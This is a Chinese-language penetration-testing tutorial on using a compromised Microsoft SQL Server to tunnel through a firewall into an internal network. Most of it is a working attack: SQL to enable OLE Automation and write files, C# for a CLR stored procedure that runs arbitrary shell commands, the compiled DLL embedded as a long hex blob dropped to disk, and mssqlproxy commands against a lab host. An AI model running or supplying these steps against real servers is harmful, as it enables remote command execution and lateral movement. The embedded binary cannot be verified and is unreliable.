利用MSSQL搭建代理突破DMZ访问受限网络

0x00 背景介绍

渗透测试中经常利用数据库连接突破 DMZ,前天看到有分享利用 MSSQL 搭建代理突破 DMZ 访问不出网的应用资产。Microsoft SQL Server 现在具备与 Microsoft Windows .NET Framework 的公共语言运行时 (CLR) 组件集成的功能。CLR 为托管代码提供服务,例如跨语言集成、代码访问安全性、对象生存期管理以及调试和分析支持。CLR 可以使用 .NET Framework 语言编写存储过程、触发器、用户定义类型、用户定义函数(标量函数和表值函数)以及用户定义的聚合函数。

0x01 环境部署

数据库服务:

演示环境:Windows Server 2008 R2 Standard

测试机地址:192.168.3.174

MSSQL版本:Microsoft SQL Server 2012 - 11.0.2100.60 (X64)

歪果大佬遇到的场景为获取互联网侧服务器权限后,通过信息收集或者常规渗透控制 MSSQL 数据库。防火墙设置规则只允许1433端口通过,无法访问核心服务器,通过 MSSQL 数据库来构造代理,访问内部资源服务。

0x02 文件操作

开启 sp_OACreate

EXEC master.dbo.sp_configure 'show advanced options',1;RECONFIGURE;

EXEC master.dbo.sp_configure 'Ole Automation Procedures', 1;RECONFIGURE;

关闭 sp_OACreate

EXEC sp_configure 'show advanced options',1;reconfigure;

EXEC sp_configure 'ole automation procedures',0;reconfigure;

EXEC sp_configure 'show advanced options',0;reconfigure;

文件写入

DECLARE @o int, @f int, @t int, @ret int

DECLARE @line varchar(8000)

EXEC sp_OACreate 'scripting.filesystemobject',@o out

EXEC sp_OAMethod @o, 'createtextfile', @f out, 'C:\windows\temp\c4.txt', 1

EXEC @ret = sp_OAMethod @f, 'writeline', NULL ,'C4'

0x03 命令执行

using System;

using System.Data;

using System.Data.SqlClient;

using System.Data.SqlTypes;

using Microsoft.SqlServer.Server;

using System.IO;

using System.Diagnostics;

using System.Text;


public partial class StoredProcedures

{

[Microsoft.SqlServer.Server.SqlProcedure]

public static void cmd_exec (SqlString execCommand)

{

Process proc = new Process();

proc.StartInfo.FileName = @"C:\Windows\System32\cmd.exe";

proc.StartInfo.Arguments = string.Format(@" /C {0}", execCommand.Value);

proc.StartInfo.UseShellExecute = false;

proc.StartInfo.RedirectStandardOutput = true;

proc.Start();


// Create the record and specify the metadata for the columns.

SqlDataRecord record = new SqlDataRecord(new SqlMetaData("output", SqlDbType.NVarChar, 4000));

// Mark the beginning of the result set.

SqlContext.Pipe.SendResultsStart(record);


// Set values for each column in the row

record.SetString(0, proc.StandardOutput.ReadToEnd().ToString());


// Send the row back to the client.

SqlContext.Pipe.SendResultsRow(record);

// Mark the end of the result set.

SqlContext.Pipe.SendResultsEnd();

proc.WaitForExit();

proc.Close();

}

};

使用 csc.exe 编译 dll 文件

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library d:\mssqlproxy\cmdexce.cs

写入编译的 dll 文件

DECLARE @ob INT;

EXEC sp_OACreate 'ADODB.Stream', @ob OUTPUT;EXEC sp_OASetProperty @ob, 'Type', 1;

EXEC sp_OAMethod @ob, 'Open';EXEC sp_OAMethod @ob, 'Write', NULL, 0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000504500004c010300f47e475e0000000000000000e00002210b010b000008000000060000000000005e270000002000000040000000000010002000000002000004000000000000000400000000000000008000000002000000000000030040850000100000100000000010000010000000000000100000000000000000000000042700005700000000400000a802000000000000000000000000000000000000006000000c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002e7465787400000064070000002000000008000000020000000000000000000000000000200000602e72737263000000a80200000040000000040000000a0000000000000000000000000000400000402e72656c6f6300000c0000000060000000020000000e000000000000000000000000000040000042000000000000000000000000000000004027000000000000480000000200050028210000dc050000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000013300500c30000000100001100730400000a0a066f0500000a72010000706f0600000a00066f0500000a72390000700f00280700000a280800000a6f0900000a00066f0500000a166f0a00000a00066f0500000a176f0b00000a00066f0c00000a26178d090000010c081672490000701f0c20a00f00006a730d00000aa208730e00000a0b280f00000a076f1000000a000716066f1100000a6f1200000a6f1300000a6f1400000a00280f00000a076f1500000a00280f00000a6f1600000a00066f1700000a00066f1800000a002a1e02281900000a2a0042534a4201000100000000000c00000076342e302e33303331390000000005006c000000e0010000237e00004c0200009402000023537472696e677300000000e0040000580000002355530038050000100000002347554944000000480500009400000023426c6f620000000000000002000001471502000900000000fa253300160000010000000f000000020000000200000001000000190000000300000001000000010000000300000000000a000100000000000600380031000a0060004b000600a50085000600c50085000a000701ec000e0030011d010e0038011d0106006e0131000a00bf01ec000a00cb013f000a00d501ec000a00e301ec000a00ee01ec0006001a02100206003a0210020000000001000000000001000100010010001700000005000100010050200000000096006a000a0001001f21000000008618730010000200000001007900190073001400210073001000290073001000310073001000310049011e00390057012300110064012800410075012c0039007c01230039008a01320039009e0132003100b9013700490073003b005900730043006100f6014a006900ff014f0031002702550079004502280009004f022800590058025a00690062024f0069007102100031008002100031008c02100009007300100020001b0019002e000b006a002e00130073006000048000000000000000000000000000000000e3000000040000000000000000000000010028000000000004000000000000000000000001003f000000000004000000000000000000000001003100000000000000003c4d6f64756c653e00636d645f657863652e646c6c0053746f72656450726f63656475726573006d73636f726c69620053797374656d004f626a6563740053797374656d2e446174610053797374656d2e446174612e53716c54797065730053716c537472696e6700636d645f65786563002e63746f720065786563436f6d6d616e640053797374656d2e52756e74696d652e436f6d70696c6572536572766963657300436f6d70696c6174696f6e52656c61786174696f6e734174747269627574650052756e74696d65436f6d7061746962696c69747941747472696275746500636d645f65786365004d6963726f736f66742e53716c5365727665722e5365727665720053716c50726f6365647572654174747269627574650053797374656d2e446961676e6f73746963730050726f636573730050726f636573735374617274496e666f006765745f5374617274496e666f007365745f46696c654e616d65006765745f56616c756500537472696e6700466f726d6174007365745f417267756d656e7473007365745f5573655368656c6c45786563757465007365745f52656469726563745374616e646172644f75747075740053746172740053716c4d657461446174610053716c4462547970650053716c446174615265636f72640053716c436f6e746578740053716c50697065006765745f506970650053656e64526573756c747353746172740053797374656d2e494f0053747265616d526561646572006765745f5374616e646172644f757470757400546578745265616465720052656164546f456e6400546f537472696e6700536574537472696e670053656e64526573756c7473526f770053656e64526573756c7473456e640057616974466f724578697400436c6f7365000000003743003a005c00570069006e0064006f00770073005c00530079007300740065006d00330032005c0063006d0064002e00650078006500000f20002f00430020007b0030007d00000d6f00750074007000750074000000a8d1b0181bae7940aee54017db44e16a0008b77a5c561934e0890500010111090320000104200101080401000000042000121d042001010e0320000e0500020e0e1c042001010203200002072003010e11290a062001011d1225040000123505200101122d042000123905200201080e0907031219122d1d12250801000800000000001e01000100540216577261704e6f6e457863657074696f6e5468726f77730100002c27000000000000000000004e270000002000000000000000000000000000000000000000000000402700000000000000000000000000000000000000005f436f72446c6c4d61696e006d73636f7265652e646c6c0000000000ff2500200010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001000000018000080000000000000000000000000000001000100000030000080000000000000000000000000000001000000000048000000584000004c02000000000000000000004c0234000000560053005f00560045005200530049004f004e005f0049004e0046004f0000000000bd04effe00000100000000000000000000000000000000003f000000000000000400000002000000000000000000000000000000440000000100560061007200460069006c00650049006e0066006f00000000002400040000005400720061006e0073006c006100740069006f006e00000000000000b004ac010000010053007400720069006e006700460069006c00650049006e0066006f0000008801000001003000300030003000300034006200300000002c0002000100460069006c0065004400650073006300720069007000740069006f006e000000000020000000300008000100460069006c006500560065007200730069006f006e000000000030002e0030002e0030002e00300000003c000d00010049006e007400650072006e0061006c004e0061006d006500000063006d0064005f0065007800630065002e0064006c006c00000000002800020001004c006500670061006c0043006f00700079007200690067006800740000002000000044000d0001004f0072006900670069006e0061006c00460069006c0065006e0061006d006500000063006d0064005f0065007800630065002e0064006c006c0000000000340008000100500072006f006400750063007400560065007200730069006f006e00000030002e0030002e0030002e003000000038000800010041007300730065006d0062006c0079002000560065007200730069006f006e00000030002e0030002e0030002e0030000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000c000000603700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000;

EXEC sp_OAMethod @ob, 'SaveToFile', NULL, 'c:\windows\temp\cmd_exec.dll', 2;

EXEC sp_OAMethod @ob, 'Close';E

XEC sp_OADestroy @ob;

执行系统命令

CREATE ASSEMBLY my_assembly

FROM 'C:\windows\temp\cmd_exec.dll'

WITH PERMISSION_SET = UNSAFE;


CREATE PROCEDURE [dbo].[cmd_exec] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [my_assembly].[StoredProcedures].[cmd_exec];

GO


cmd_exec 'ver'


DROP PROCEDURE cmd_exec

DROP ASSEMBLY my_assembly

0x04 环境测试

python mssqlclient.py administrator@192.168.3.174 -windows-auth

upload reciclador.dll C:\windows\temp\reciclador.dll

python mssqlclient.py administrator@192.168.3.174 -windows-auth -install -clr assembly.dll

USE msdb;

SELECT SCHEMA_NAME(so.[schema_id]) AS [schema_name],

af.file_id,

af.name + '.dll' as [file_name],

asmbly.clr_name,

asmbly.assembly_id,

asmbly.name AS [assembly_name],

am.assembly_class,

am.assembly_method,

so.object_id as [sp_object_id],

so.name AS [sp_name],

so.[type] as [sp_type],

asmbly.permission_set_desc,

asmbly.create_date,

asmbly.modify_date,

af.content

FROM sys.assembly_modules am

INNER JOIN sys.assemblies asmbly

ON asmbly.assembly_id = am.assembly_id

INNER JOIN sys.assembly_files af

ON asmbly.assembly_id = af.assembly_id

INNER JOIN sys.objects so

ON so.[object_id] = am.[object_id]

python mssqlclient.py administrator@192.168.3.174 -windows-auth -check -reciclador "C:\windows\temp\reciclador.dll"

python mssqlclient.py administrator@192.168.3.174 -windows-auth -start -reciclador "C:\windows\temp\reciclador.dll"

参考文章

https://github.com/blackarrowsec/mssqlproxy

https://www.blackarrow.net/mssqlproxy-pivoting-clr/

https://blog.netspi.com/attacking-sql-server-clr-assemblies/

我来评几句
登录后评论

已发表评论数()

相关站点

+订阅
热门文章